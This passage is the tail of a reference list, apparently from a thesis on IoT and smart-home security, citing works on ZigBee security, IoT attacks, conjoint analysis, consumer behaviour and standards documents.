[252] M. Ryan, “Bluetooth: With low energy comes low security,” in 7th USENIX Workshop on Offensive Technologies, WOOT ’13, Washington, D.C., USA, August 13, 2013, J. Oberheide and W. K. Robertson, Eds. USENIX Association, 2013. [Online]. Available: https://www.usenix.org/conference/woot13/workshop-program/presentation/ryan

[253] R. Safavi-Naini, Digital Rights Management: Technologies, Issues, Challenges and Systems. Springer Science & Business Media, 2006, vol. 3919.

[254] D. Salzner, “Security analysis of I2C communications in smart home products,” Master’s thesis, Friedrich-Alexander-Universität Erlangen-Nürnberg, Germany, June 2016.

[255] K. Sammer and R. Wüstenhagen, “The influence of eco-labelling on consumer behaviour – Results of a discrete choice analysis for washing machines,” Business Strategy and the Environment, vol. 15, no. 3, pp. 185–199, 2006. [Online]. Available: http://dx.doi.org/10.1002/bse.522

[256] R. C. Sampson, “R&D alliances and firm performance: The impact of technological diversity and alliance organization on innovation,” The Academy of Management Journal, vol. 50, no. 2, pp. 364–386, 2007. [Online]. Available: http://www.jstor.org/stable/20159859

[257] L. Sánchez, L. Muñoz, J. A. Galache, P. Sotres, J. R. Santana, V. Gutiérrez, R. Ramdhany, A. Gluhak, S. Krco, E. Theodoridis, and D. Pfisterer, “SmartSantander: IoT experimentation over a smart city testbed,” Computer Networks, vol. 61, pp. 217–238, 2014. [Online]. Available: https://doi.org/10.1016/j.bjp.2013.12.020

[258] N. Sastry and D. Wagner, “Security considerations for IEEE 802.15.4 networks,” in Proceedings of the 2004 ACM Workshop on Wireless Security, Philadelphia, PA, USA, October 1, 2004, M. Jakobsson and A. Perrig, Eds. ACM, 2004, pp. 32–42. [Online]. Available: http://doi.acm.org/10.1145/1023646.1023654

[259] Y. Sawaya, M. Sharif, N. Christin, A. Kubota, A. Nakarai, and A. Yamada, “Self-confidence trumps knowledge: A cross-cultural study of security behavior,” in Proceedings of the 2017 CHI Conference on Human Factors in Computing Systems, Denver, CO, USA, May 06-11, 2017, 2017, pp. 2202–2214. [Online]. Available: https://doi.org/10.1145/3025453.3025926

[260] Sawtooth Software, Inc., “The CBC latent class technical paper – Version 3,” Sawtooth Software Technical Paper Series, 2004. [Online]. Available: https://www.sawtoothsoftware.com/download/techpap/lctech.pdf

[261] ——, “The Apple vs. Samsung ‘patent trial of the century,’ conjoint analysis, and Sawtooth Software,” 2012. [Online]. Available: http://www.sawtoothsoftware.com/download/apple v samsung conjoint analysis.pdf

[262] ——, “The CBC system for choice-based conjoint analysis – Version 9,” Sawtooth Software Technical Paper Series, 2017. [Online]. Available: https://www.sawtoothsoftware.com/download/techpap/cbctech.pdf

[263] B. Schneier, “Testimony of Bruce Schneier [...] before the U.S. House of Representatives [...] joint hearing entitled “Understanding the role of connected devices in recent cyber attacks”,” November 2016. [Online]. Available: https://docs.house.gov/meetings/IF/IF17/20161116/105418/HHRG-114-IF17-Wstate-SchneierB-20161116.pdf

[264] A. Scholl, L. Manthey, R. Helm, and M. Steiner, “Solving multiattribute design problems with analytic hierarchy process and conjoint analysis: An empirical comparison,” European Journal of Operational Research, vol. 164, no. 3, pp. 760–777, 2005. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0377221704000700

[265] V. Sharma, K. Lee, S. Kwon, J. Kim, H. Park, K. Yim, and S. Lee, “A consensus framework for reliability and mitigation of zero-day attacks in IoT,” Security and Communication Networks, vol. 2017, pp. 1–24, 2017. [Online]. Available: https://doi.org/10.1155/2017/4749085

[266] D. Shepardson, “U.S. judge approves $14.7 billion deal in VW diesel scandal,” Reuters, October 2016. [Online]. Available: http://www.reuters.com/article/us-volkswagen-emissions-idUSKCN12P22F

[267] Y. Shiyanovskii, F. G. Wolff, A. Rajendran, C. A. Papachristou, D. J. Weyer, and W. Clay, “Process reliability based trojans through NBTI and HCI effects,” in 2010 NASA/ESA Conference on Adaptive Hardware and Systems, AHS 2010, Anaheim, California, USA, June 15-18, 2010, T. Arslan, D. Keymeulen, D. Merodio, K. Benkrid, A. T. Erdogan, and U. D. Patel, Eds. IEEE Computer Society, 2010, pp. 215–222. [Online]. Available: https://doi.org/10.1109/AHS.2010.5546257

[268] A. Shostack, Threat modeling: Designing for security. John Wiley & Sons, 2014.

[269] D. Shreenivas, S. Raza, and T. Voigt, “Intrusion detection in the RPL-connected 6LoWPAN networks,” in Proceedings of the 3rd ACM International Workshop on IoT Privacy, Trust, and Security, IoTPTS@AsiaCCS 2017, Abu Dhabi, United Arab Emirates, April 2, 2017, R. Chow and G. Saldamli, Eds. ACM, 2017, pp. 31–38. [Online]. Available: http://doi.acm.org/10.1145/3055245.3055252

[270] S. Siby, R. R. Maiti, and N. O. Tippenhauer, “IoTScanner: Detecting privacy threats in IoT neighborhoods,” in Proceedings of the 3rd ACM International Workshop on IoT Privacy, Trust, and Security, IoTPTS@AsiaCCS 2017, Abu Dhabi, United Arab Emirates, April 2, 2017, R. Chow and G. Saldamli, Eds. ACM, 2017, pp. 23–30. [Online]. Available: http://doi.acm.org/10.1145/3055245.3055253

[271] Sigfox, “SIGFOX expanding IoT network in 100 U.S. cities,” February 2017. [Online]. Available: https://www.sigfox.com/en/news/sigfox-expanding-iot-network-100-us-cities

[272] A. K. Sikder, H. Aksu, and A. S. Uluagac, “6thSense: A context-aware sensor-based attack detector for smart devices,” in 26th USENIX Security Symposium, USENIX Security 2017, Vancouver, BC, Canada, August 16-18, 2017, E. Kirda and T. Ristenpart, Eds. USENIX Association, 2017, pp. 397–414. [Online]. Available: https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/sikder

[273] H. Sinanovic and S. Mrdovic, “Analysis of Mirai malicious software,” in 25th International Conference on Software, Telecommunications and Computer Networks, SoftCOM 2017, Split, Croatia, September 21-23, 2017, D. Begusic, N. Rozic, J. Radic, and M. Saric, Eds. IEEE, 2017, pp. 1–5. [Online]. Available: https://doi.org/10.23919/SOFTCOM.2017.8115504

[274] V. Sivaraman, D. Chan, D. Earl, and R. Boreli, “Smart-phones attacking smart-homes,” in Proceedings of the 9th ACM Conference on Security & Privacy in Wireless and Mobile Networks, WISEC 2016, Darmstadt, Germany, July 18-22, 2016, M. Hollick, P. Papadimitratos, and W. Enck, Eds. ACM, 2016, pp. 195–200. [Online]. Available: http://doi.acm.org/10.1145/2939918.2939925

[275] S. Soltan, P. Mittal, and H. V. Poor, “BlackIoT: IoT botnet of high wattage devices can disrupt the power grid,” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018, W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 15–32. [Online]. Available: https://www.usenix.org/conference/usenixsecurity18/presentation/soltan

[276] S. Spiekermann, A. Acquisti, R. Böhme, and K. L. Hui, “The challenges of personal data markets and privacy,” Electronic Markets, vol. 25, no. 2, pp. 161–167, 2015. [Online]. Available: https://doi.org/10.1007/s12525-015-0191-0

[277] G. Sprint, D. J. Cook, R. Fritz, and M. Schmitter-Edgecombe, “Detecting health and behavior change by analyzing smart home sensor data,” in 2016 IEEE International Conference on Smart Computing, SMARTCOMP 2016, St Louis, MO, USA, May 18-20, 2016. IEEE Computer Society, 2016, pp. 1–3. [Online]. Available: https://doi.org/10.1109/SMARTCOMP.2016.7501687

[278] Statista, “Smart home report 2019,” December 2018. [Online]. Available: https://www.statista.com/study/42112/smart-home-report/

[279] J.-B. E. Steenkamp and D. R. Wittink, “The metric quality of full-profile judgments and the number-of-attribute-levels effect in conjoint analysis,” International Journal of Research in Marketing, vol. 11, no. 3, pp. 275–286, 1994. [Online]. Available: http://www.sciencedirect.com/science/article/pii/016781169490006X

[280] M. Steiner, N. Wiegand, A. Eggert, and K. Backhaus, “Platform adoption in system markets: The roles of preference heterogeneity and consumer expectations,” International Journal of Research in Marketing, vol. 33, no. 2, pp. 276–296, 2016. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0167811615000762

[281] STMicroelectronics, “STM32F303CB datasheet,” May 2016. [Online]. Available: https://www.st.com/resource/en/datasheet/stm32f303vc.pdf

[282] ——, “STM32Cube initialization code generator datasheet,” July 2017. [Online]. Available: https://www.st.com/en/development-tools/stm32cubemx.html

[283] C. Sturton, M. Hicks, D. A. Wagner, and S. T. King, “Defeating UCI: Building stealthy and malicious hardware,” in 32nd IEEE Symposium on Security and Privacy, S&P 2011, 22-25 May 2011, Berkeley, California, USA. IEEE Computer Society, 2011, pp. 64–77. [Online]. Available: https://doi.org/10.1109/SP.2011.32

[284] G. M. P. Swann, “The economics of standardization,” University of Manchester, Manchester, UK, December 2000. [Online]. Available: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.430.1657&rep=rep1&type=pdf

[285] The Secretary of Commerce and The Secretary of Homeland Security, “A report to the President on enhancing the resilience of the Internet and communications ecosystem against botnets and other automated, distributed threats,” May 2018. [Online]. Available: https://www.commerce.gov/sites/commerce.gov/files/media/files/2018/eo 13800 botnet report - finalv2.pdf

[286] M. Thomas and V. Morwitz, “Penny wise and Pound foolish: The left-digit effect in price cognition,” Journal of Consumer Research, vol. 32, no. 1, pp. 54–64, June 2005. [Online]. Available: https://dx.doi.org/10.1086/429600

[287] P. Thubert, C. Bormann, L. Toutain, and R. Cragie, “IPv6 over low-power wireless personal area network (6LoWPAN) routing header,” Internet Engineering Task Force (IETF) - Request for Comments: 8138, April 2017. [Online]. Available: https://tools.ietf.org/html/rfc8138

[288] S. Tomasin, S. Zulian, and L. Vangelista, “Security analysis of LoRaWAN join procedure for Internet of Things networks,” in 2017 IEEE Wireless Communications and Networking Conference Workshops, WCNC Workshops 2017, San Francisco, CA, USA, March 19-22, 2017. IEEE, 2017, pp. 1–6. [Online]. Available: https://doi.org/10.1109/WCNCW.2017.7919091

[289] S. Torabi, E. Bou-Harb, C. Assi, M. Galluscio, A. Boukhtouta, and M. Debbabi, “Inferring, characterizing, and investigating Internet-scale malicious IoT device activities: A network telescope perspective,” in 48th Annual IEEE/IFIP International Conference on Dependable Systems and Networks, DSN 2018, Luxembourg City, Luxembourg, June 25-28, 2018. IEEE Computer Society, 2018, pp. 562–573. [Online]. Available: https://doi.org/10.1109/DSN.2018.00064

[290] P. Torr, “Demystifying the threat-modeling process,” IEEE Security & Privacy, vol. 3, no. 5, pp. 66–70, 2005. [Online]. Available: https://doi.org/10.1109/MSP.2005.119

[291] J. Y. Tsai, S. Egelman, L. F. Cranor, and A. Acquisti, “The effect of online privacy information on purchasing behavior: An experimental study,” Information Systems Research, vol. 22, no. 2, pp. 254–268, 2011. [Online]. Available: https://doi.org/10.1287/isre.1090.0260

[292] Y. Tu, Z. Lin, I. Lee, and X. Hei, “Injected and delivered: Fabricating implicit control over actuation systems by spoofing inertial sensors,” in 27th USENIX Security Symposium, USENIX Security 2018, Baltimore, MD, USA, August 15-17, 2018, W. Enck and A. P. Felt, Eds. USENIX Association, 2018, pp. 1545–1562. [Online]. Available: https://www.usenix.org/conference/usenixsecurity18/presentation/tu

[293] Twitter, “MayaZigBee,” March 2015. [Online]. Available: https://twitter.com/mayazigbee

[294] UN General Assembly, “Universal Declaration of Human Rights,” UN General Assembly, 1948.

[295] J. Valente and A. A. Cárdenas, “Security & privacy in smart toys,” in Proceedings of the 2017 Workshop on Internet of Things Security and Privacy, IoT S&P@CCS, Dallas, TX, USA, November 03, 2017, P. Liu, Y. Zhang, T. Benson, and S. Sundaresan, Eds. ACM, 2017, pp. 19–24. [Online]. Available: http://doi.acm.org/10.1145/3139937.3139947

[296] T. van Kasteren, A. K. Noulas, G. Englebienne, and B. J. A. Kröse, “Accurate activity recognition in a home setting,” in UbiComp 2008: Ubiquitous Computing, 10th International Conference, UbiComp 2008, Seoul, Korea, September 21-24, 2008, Proceedings, ser. ACM International Conference Proceeding Series, H. Y. Youn and W. Cho, Eds., vol. 344. ACM, 2008, pp. 1–9. [Online]. Available: https://doi.org/10.1145/1409635.1409637

[297] K. Vaniea, E. J. Rader, and R. Wash, “Betrayed by updates: How negative experiences affect future security,” in CHI Conference on Human Factors in Computing Systems, CHI’14, Toronto, ON, Canada - April 26 - May 01, 2014, M. Jones, P. A. Palanque, A. Schmidt, and T. Grossman, Eds. ACM, 2014, pp. 2671–2674. [Online]. Available: http://doi.acm.org/10.1145/2556288.2557275

[298] K. Vaniea and Y. Rashidi, “Tales of software updates: The process of updating software,” in Proceedings of the 2016 CHI Conference on Human Factors in Computing Systems, San Jose, CA, USA, May 7-12, 2016, J. Kaye, A. Druin, C. Lampe, D. Morris, and J. P. Hourcade, Eds. ACM, 2016, pp. 3215–3226. [Online]. Available: http://doi.acm.org/10.1145/2858036.2858303

[299] V. Venkatesh, J. Y. L. Thong, and X. Xu, “Consumer acceptance and use of information technology: Extending the unified theory of acceptance and use of technology,” MIS Quarterly, vol. 36, no. 1, pp. 157–178, 2012. [Online]. Available: http://www.jstor.org/stable/41410412

[300] P. Vervier and Y. Shen, “Before toasters rise up: A view into the emerging IoT threat landscape,” in Research in Attacks, Intrusions, and Defenses - 21st International Symposium, RAID 2018, Heraklion, Crete, Greece, September 10-12, 2018, Proceedings, ser. Lecture Notes in Computer Science, M. Bailey, T. Holz, M. Stamatogiannakis, and S. Ioannidis, Eds., vol. 11050. Springer, 2018, pp. 556–576. [Online]. Available: https://doi.org/10.1007/978-3-030-00470-5_26

[301] N. Vidgren, K. Haataja, J. L. Patino-Andres, J. J. Ramirez-Sanchis, and P. Toivanen, “Security threats in ZigBee-enabled systems: Vulnerability evaluation, practical experiments, countermeasures, and lessons learned,” in 46th Hawaii International Conference on System Sciences, HICSS 2013, Wailea, HI, USA, January 7-10, 2013. IEEE, 2013, pp. 5132–5138. [Online]. Available: http://dx.doi.org/10.1109/HICSS.2013.475

[302] F. Völckner, “The dual role of price: Decomposing consumers’ reactions to price,” Journal of the Academy of Marketing Science, vol. 36, no. 3, pp. 359–377, September 2008. [Online]. Available: https://doi.org/10.1007/s11747-007-0076-7

[303] S. Voleti, V. Srinivasan, and P. Ghosh, “An approach to improve the predictive power of choice-based conjoint analysis,” International Journal of Research in Marketing, vol. 34, no. 2, pp. 325–335, 2017. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0167811616301161

[304] P. Waide, “Monitoring of energy efficiency trends of refrigerators, freezers, washing machines and washer-driers sold in the EU,” PW Consulting for ADEME on behalf of the European Commission (SAVE). PW Consulting: Manchester, 2001.

[305] K. L. Wakefield and J. Inman, “Situational price sensitivity: The role of consumption occasion, social context and income,” Journal of Retailing, vol. 79, no. 4, pp. 199–212, 2003. [Online]. Available: http://www.sciencedirect.com/science/article/pii/S0022435903000551

[306] Q. Wang, W. U. Hassan, A. M. Bates, and C. A. Gunter, “Fear and logging in the Internet of Things,” in 25th Annual Network and Distributed System Security Symposium, NDSS 2018, San Diego, California, USA, February 18-21, 2018. The Internet Society, 2018. [Online]. Available: http://wp.internetsociety.org/ndss/wp-content/uploads/sites/25/2018/02/ndss2018 01A-2 Wang paper.pdf

[307] M. R. Warner, “S.1691 - Internet of Things (IoT) Cybersecurity Improvement Act of 2017,” August 2017. [Online]. Available: https://www.congress.gov/bill/115th-congress/senate-bill/1691/text

[308] M. Weyrich and C. Ebert, “Reference architectures for the Internet of Things,” IEEE Software, vol. 33, no. 1, pp. 112–116, 2016. [Online]. Available: https://doi.org/10.1109/MS.2016.20

[309] A. Wilkins, J. Veitch, and B. Lehman, “LED lighting flicker and potential health concerns: IEEE standard PAR1789 update,” in 2010 IEEE Energy Conversion Congress and Exposition, September 2010, pp. 171–178. [Online]. Available: https://doi.org/10.1109/ECCE.2010.5618050

[310] J. Winward, P. Schiellerup, and B. Boardman, Cool labels: The first three years of the European energy label. Energy and Environment Programme, Environmental Change Unit, University of Oxford, 1998. [Online]. Available: https://www.eci.ox.ac.uk/research/energy/downloads/coollabels.pdf

[311] I. H. Witten, E. Frank, and M. A. Hall, Data mining: Practical machine learning tools and techniques, 3rd Edition. Morgan Kaufmann, Elsevier, 2011. [Online]. Available: http://www.worldcat.org/oclc/262433473

[312] D. R. Wittink, M. Vriens, and W. Burhenne, “Commercial use of conjoint analysis in Europe: Results and critical reflections,” International Journal of Research in Marketing, vol. 11, no. 1, pp. 41–52, 1994. [Online]. Available: http://www.sciencedirect.com/science/article/pii/0167811694900337

[313] World Bank, “Households and NPISHs Final consumption expenditure,” 2016. [Online]. Available: https://data.worldbank.org/indicator/NE.CON.PRVT.CD

[314] D. Wörner, T. von Bomhard, M. Roeschlin, and F. Wortmann, “Look twice: Uncover hidden information in room climate sensor data,” in 4th International Conference on the Internet of Things, IoT 2014, Cambridge, MA, USA, October 6-8, 2014. IEEE, 2014, pp. 25–30. [Online]. Available: http://dx.doi.org/10.1109/IOT.2014.7030110

[315] J. Wright, “KillerBee: Practical ZigBee exploitation framework,” 2009, ToorCon 11. [Online]. Available: http://www.willhackforsushi.com/presentations/toorcon11-wright.pdf

[316] K. Wuyts, “Privacy threats in software architectures,” Ph.D. dissertation, KU Leuven – Faculty of Engineering Science, 2015. [Online]. Available: https://lirias.kuleuven.be/retrieve/295669

[317] M. Wynn, K. Tillotson, R. Kao, A. Calderon, A. F. Murillo, J. Camargo, R. Mantilla, B. Rangel, A. A. Cárdenas, and S. J. Rueda, “Sexual intimacy in the age of smart devices: Are we practicing safe IoT?” in Proceedings of the 2017 Workshop on Internet of Things Security and Privacy, IoT S&P@CCS, Dallas, TX, USA, November 03, 2017, P. Liu, Y. Zhang, T. Benson, and S. Sundaresan, Eds. ACM, 2017, pp. 25–30. [Online]. Available: http://doi.acm.org/10.1145/3139937.3139942

[318] K. Yang, M. Hicks, Q. Dong, T. M. Austin, and D. Sylvester, “A2: Analog malicious hardware,” in IEEE Symposium on Security and Privacy, SP 2016, San Jose, CA, USA, May 22-26, 2016. IEEE Computer Society, 2016, pp. 18–37. [Online]. Available: https://doi.org/10.1109/SP.2016.10

[319] W. Yang, N. Li, Y. Qi, W. H. Qardaji, S. E. McLaughlin, and P. D. McDaniel, “Minimizing private data disclosures in the smart grid,” in the ACM Conference on Computer and Communications Security, CCS’12, Raleigh, NC, USA, October 16-18, 2012, T. Yu, G. Danezis, and V. D. Gligor, Eds. ACM, 2012, pp. 415–427. [Online]. Available: https://doi.org/10.1145/2382196.2382242

[320] Z. Yang, N. Li, B. Becerik-Gerber, and M. D. Orosz, “A systematic approach to occupancy modeling in ambient sensor-rich buildings,” Simulation, vol. 90, no. 8, pp. 960–977, 2014. [Online]. Available: http://dx.doi.org/10.1177/0037549713489918

[321] M. Ye, N. Jiang, H. Yang, and Q. Yan, “Security analysis of Internet-of-Things: A case study of August smart lock,” in 2017 IEEE Conference on Computer Communications Workshops, INFOCOM Workshops, Atlanta, GA, USA, May 1-4, 2017. IEEE, 2017, pp. 499–504. [Online]. Available: https://doi.org/10.1109/INFCOMW.2017.8116427

[322] E. Zeng, S. Mare, and F. Roesner, “End user security and privacy concerns with smart homes,” in Thirteenth Symposium on Usable Privacy and Security, SOUPS 2017, Santa Clara, CA, USA, July 12-14, 2017. USENIX Association, 2017, pp. 65–80. [Online]. Available: https://www.usenix.org/conference/soups2017/technical-sessions/presentation/zeng

[323] K. Zhang, J. Ni, K. Yang, X. Liang, J. Ren, and X. S. Shen, “Security and privacy in smart city applications: Challenges and solutions,” IEEE Communications Magazine, vol. 55, no. 1, pp. 122–129, 2017. [Online]. Available: https://doi.org/10.1109/MCOM.2017.1600267CM

[324] R. Zhang, K. P. Lam, Y. Chiou, and B. Dong, “Information-theoretic environment features selection for occupancy detection in open office spaces,” Building Simulation, vol. 5, no. 2, pp. 179–188, 2012. [Online]. Available: http://dx.doi.org/10.1007/s12273-012-0075-6

[325] Z. Zhang, M. C. Y. Cho, and S. Shieh, “Emerging security threats and countermeasures in IoT,” in Proceedings of the 10th ACM Symposium on Information, Computer and Communications Security, ASIA CCS ’15, Singapore, April 14-17, 2015, F. Bao, S. Miller, J. Zhou, and G. Ahn, Eds. ACM, 2015, pp. 1–6. [Online]. Available: http://doi.acm.org/10.1145/2714576.2737091

[326] ZigBee Alliance, ZigBee Building Automation Standard Version 1.0 – Document 053516r12, May 2011. [Online]. Available: https://www.zigbee.org/zigbee-for-developers/applicationstandards/zigbee-building-automation/

[327] ——, ZigBee Light Link Standard Version 1.0 – Document 11-0037-10, April 2012. [Online]. Available: https://www.zigbee.org/zigbee-for-developers/applicationstandards/zigbee-light-link/

[328] ——, Smart Energy Profile 2 Application Protocol Standard – Document 13-0200-00, April 2013. [Online]. Available: https://www.zigbee.org/download/standard-smart-energy-profile-2-0/

[329] ——, ZigBee Home Automation Public Application Profile Version 1.2 – Document 05-3520-29, June 2013. [Online]. Available: https://www.zigbee.org/zigbee-for-developers/applicationstandards/zigbeehomeautomation/

[330] ——, Base Device Behavior Specification Version 1.0 – Document 13-0402-13, February 2016. [Online]. Available: http://www.zigbee.org/wp-content/uploads/2014/10/docs-13-0402-13-00zi-Base-Device-Behavior-Specification-2.pdf

[331] ——, “ZigBee Alliance accelerates IoT unification with 20 ZigBee 3.0 platform certifications,” December 2016. [Online]. Available: http://www.zigbee.org/zigbee-alliance-accelerates-iot-unification-with-20-zigbee-3-0-platform-certifications/

[332] ——, ZigBee Cluster Library Specification Revision 6 – Document 07-5123-06, January 2016. [Online]. Available: http://www.zigbee.org/~zigbeeor/wp-content/uploads/2014/10/07-5123-06-zigbee-cluster-library-specification.pdf

[333] ——, “The ZigBee Alliance to unveil universal language for the IoT from CES 2017,” January 2017. [Online]. Available: http://www.zigbee.org/the-zigbee-alliance-to-unveil-universal-language-for-the-iot-from-ces-2017-making-it-possible-for-smart-objects-to-work-together-on-any-network/

[334] ——, “ZigBee Certified Products,” 2017. [Online]. Available: http://www.zigbee.org/zigbee-products-2/

[335] ——, “Join the ZigBee Alliance and shape the future of the Internet of Things,” 2018. [Online]. Available: http://www.zigbee.org/zigbeealliance/join/

[336] ZigBee Standards Organization, ZigBee Specification – Document 053474r20, September 2012.

[337] T. Zillner and S. Strobl, “ZigBee exploited – The good, the bad and the ugly,” 2015, Black Hat USA. [Online]. Available: https://www.blackhat.com/docs/us-15/materials/us-15-Zillner-ZigBee-Exploited-The-Good-The-Bad-And-The-Ugly.pdf

[338] L. Zimmermann, R. Weigel, and G. Fischer, “Fusion of nonintrusive environmental sensors for occupancy detection in smart homes,” IEEE Internet of Things Journal, vol. 5, no. 4, pp. 2343–2352, Aug 2018. [Online]. Available: https://doi.org/10.1109/JIOT.2017.2752134
